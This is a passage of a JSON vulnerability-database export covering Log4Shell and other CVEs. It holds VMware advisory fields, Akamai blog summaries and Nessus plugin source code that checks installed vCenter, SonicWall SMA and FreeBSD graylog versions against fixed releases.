Documentation**\n\nNone.\n\n**Acknowledgements**\n\nNone. \n\n\n**Notes**\n\n * Exploitation attempts in the wild have been confirmed by VMware.\n * A supplemental blog post & frequently asked questions list was created for additional clarification. 
Please see: <https://via.vmw.com/vmsa-2021-0028-faq>\n * Unaffected VMware products can be referred to on the Knowledge Base article: <https://kb.vmware.com/s/article/87068>\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "vmware", "title": "VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T00:00:00", "id": "VMSA-2021-0028.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0028.1.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "akamaiblog": [{"lastseen": "2022-07-15T19:58:18", "description": "", "cvss3": {}, "published": "2020-04-15T18:47:00", "type": "akamaiblog", "title": "What's a 10? 
Pwning vCenter with CVE-2020-3952", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-15T18:47:00", "id": "AKAMAIBLOG:84DFD86F1486CB7C353A93F819261FA2", "href": "https://www.akamai.com/blog/security/pwning-vmware-vcenter-cve-2020-3952", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-18T00:39:45", "description": "Continuing with our research into CVE-2021-44228, Akamai has previously written about what the vulnerability is and given recommendations on how to go beyond patching for extra protection. Across the Akamai network, we see traffic from 1.3 billion unique devices daily, with record traffic of 182 Tbps. The threat research team has been investigating this traffic to gain deeper insights into how this vulnerability is being exploited. We want to share more technical findings and what they mean for threat hunters. Here are some implications for defenders and threat hunters to consider", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T19:30:00", "type": "akamaiblog", "title": "Threat Intelligence on Log4j CVE: Key Findings and Their Implications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T19:30:00", "id": "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "href": "https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T00:37:20", "description": "Log4Shell (CVE-2021-44228) is a remote code execution (RCE) vulnerability in the Apache-foundation open-source logging library Log4j. It was published on December 9, 2021, and then all hell broke loose. As Log4j is a common logging library for Java applications, it is highly widespread.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T19:30:00", "type": "akamaiblog", "title": "Our Journey to Detect Log4j-Vulnerable Machines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T19:30:00", "id": "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "href": "https://www.akamai.com/blog/security/our-journey-to-detect-log4j-vulnerable-machines", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:37:08", "description": "A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that's used widely in applications, including many by large enterprise organizations. The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that utilize the library by manipulating log messages. There are already reports of servers performing internet-wide scans in attempts to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T10:30:00", "type": "akamaiblog", "title": "Akamai Recommendations for Log4j Mitigation", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T10:30:00", "id": 
"AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "href": "https://www.akamai.com/blog/security/akamai-recommendations-for-log4j-mitigation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T15:31:47", "description": "The version of VMware vCenter Server installed on the remote host is 6.7 prior to U3F, and is, therefore, affected by an information disclosure vulnerability caused by insufficient access controls in vmdir. An attacker with network access to an affected vmdir deployment may be able to extract highly sensitive information. This information can be used to compromise the vCenter Server or other services which depend on VMware directory service authentication. (CVE-2020-3952) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-13T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2020-0006.NASL", "href": "https://www.tenable.com/plugins/nessus/135411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135411);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-3952\");\n script_xref(name:\"VMSA\", value:\"2020-0006\");\n script_xref(name:\"IAVA\", value:\"2020-A-0136-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"A virtualization management application installed on the remote host is affected by a\nsensitive information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.7 prior\nto U3F, and is, therefore, affected by an information disclosure vulnerability caused by\ninsufficient access controls in vmdir. An attacker with network access to an \naffected vmdir deployment may be able to extract highly sensitive information. This information\ncan be used to compromise the vCenter Server or other services which depend on VMware directory \nservice authentication. (CVE-2020-3952)\n \nNote that Nessus has not tested for these issues but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2020-0006.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.7 U3F or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nport = get_kb_item_or_exit('Host/VMware/vCenter');\nversion = get_kb_item_or_exit('Host/VMware/version');\nrelease = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$', string:release, replace:\"\\1\");\nif (build !~ '^[0-9]+$') exit(1, 'Failed to extract the build number from the release string.');\n\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\n\n# Check version and build numbers\n# 6.7 U3 https://docs.vmware.com/en/VMware-vSphere/6.7/rn/vsphere-vcenter-server-67u3f-release-notes.html\nif(version =~ '^VMWare vCenter 6\\\\.7$' && int(build) < 15976714) fixversion = '6.7.0 build-15976714';\nelse audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n 'Installed version', release,\n 'Fixed version', fixversion\n ),\n ordered_fields:make_list('Installed version', 'Fixed version')\n);\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T16:25:41", "description": "According to its self-reported version, the remote SonicWall Secure Mobile Access is affected by multiple vulnerabilities, including:\n\n - An unauthenticated 
stack-based buffer overflow in the SonicWall SMA SSLVPN Apache httpd server: for GET requests, the mod_cgi module concatenates environment variables into a single stack-based buffer using `strcat` without bounds checking. This can allow a remote, unauthenticated attacker to execute arbitrary code. (CVE-2021-20038)\n\n - Multiple unauthenticated file explorer heap-based and stack-based buffer overflows due to the sonicfiles RAC_COPY_TO (RacNumber 36) method, which allows users to upload files to an SMB share and can be called without any authentication. This can allow a remote, unauthenticated attacker to execute arbitrary code as the nobody user.\n (CVE-2021-20045)\n\n - A heap-based buffer overflow due to the RAC_GET_BOOKMARKS_HTML5 (RacNumber 35) method that allows users to list their bookmarks. This method is vulnerable to heap-based buffer-overflow, due to unchecked use of strcat. This can allow a remote, authenticated attacker to execute arbitrary code as the nobody user. (CVE-2021-20043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-09T00:00:00", "type": "nessus", "title": "SonicWall Secure Mobile Access Multiple Vulnerabilities (SNWLID-2021-0026)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042", "CVE-2021-20043", "CVE-2021-20044", "CVE-2021-20045"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:sonicwall:sma_100_firmware"], "id": "SONICWALL_SMA_SNWLID-2021-0026.NASL", "href": "https://www.tenable.com/plugins/nessus/155961", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155961);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2021-20038\",\n \"CVE-2021-20039\",\n \"CVE-2021-20040\",\n \"CVE-2021-20041\",\n \"CVE-2021-20042\",\n \"CVE-2021-20043\",\n \"CVE-2021-20044\",\n \"CVE-2021-20045\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0572\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/11\");\n\n script_name(english:\"SonicWall Secure Mobile Access Multiple Vulnerabilities (SNWLID-2021-0026)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall Secure Mobile Access is affected by multiple\nvulnerabilities, including:\n\n - An unauthenticated stack-based buffer overflow in the SonicWall SMA SSLVPN Apache httpd server: for GET requests,\n the mod_cgi module concatenates environment variables into a single stack-based buffer using `strcat` without\n bounds checking. This can allow a remote, unauthenticated attacker to execute arbitrary code. (CVE-2021-20038)\n\n - Multiple unauthenticated file explorer heap-based and stack-based buffer overflows due to the sonicfiles RAC_COPY_TO\n (RacNumber 36) method, which allows users to upload files to an SMB share and can be called without any\n authentication. This can allow a remote, unauthenticated attacker to execute arbitrary code as the nobody user.\n (CVE-2021-20045)\n\n - A heap-based buffer overflow due to the RAC_GET_BOOKMARKS_HTML5 (RacNumber 35) method that allows users to list\n their bookmarks. This method is vulnerable to heap-based buffer-overflow, due to unchecked use of strcat. This can\n allow a remote, authenticated attacker to execute arbitrary code as the nobody user. 
(CVE-2021-20043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e1e1dbee\");\n # https://www.sonicwall.com/support/product-notification/product-security-notice-sma-100-series-vulnerability-patches-q4-2021/211201154715443/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01c34e29\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 10.2.0.9-41sv or 10.2.1.3-27sv or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20044\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-20045\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SonicWall SMA 100 Series Authenticated Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sonicwall:sma_100_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sonicwall_sma_web_detect.nbin\");\n script_require_keys(\"installed_sw/SonicWall Secure Mobile Access\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'SonicWall Secure Mobile Access';\nvar port = get_http_port(default:443,embedded:TRUE);\nvar app = vcf::get_app_info(app:app_name, webapp:TRUE, port:port);\n\nif (app['Model'] !~ \"SMA (200|210|400|410|500v)\")\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, port);\n\nvar constraints =\n[\n {'min_version' : '9.0.0.0.0', 'max_version': '9.0.0.11.31', 'fixed_version' : '10.2.0.9.41', 'fixed_display':'Upgrade to version 10.2.0.9-41sv or later.'},\n {'min_version' : '10.2.0.0.0', 'max_version': '10.2.0.8.37', 'fixed_version' : '10.2.0.9.41', 'fixed_display':'Upgrade to version 10.2.0.9-41sv or later.'},\n {'min_version' : '10.2.1.0.0', 'max_version': '10.2.1.1.19', 'fixed_version' : '10.2.1.3.27', 'fixed_display':'Upgrade to version 10.2.1.3-27sv or later.'},\n {'min_version' : '10.2.1.2.0', 'max_version': '10.2.1.2.24', 'fixed_version' : '10.2.1.3.27', 'fixed_display':'Upgrade to version 10.2.1.3-27sv or later.'}\n];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-03T02:29:58", "description": "A remote code execution vulnerability exists in VMWare vCenter in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. 
A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156035", "sourceData": "Binary data vmware_vcenter_log4shell.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:37:15", "description": "The version of FreeBSD installed on the remote host is prior to the tested version. It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. 
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacke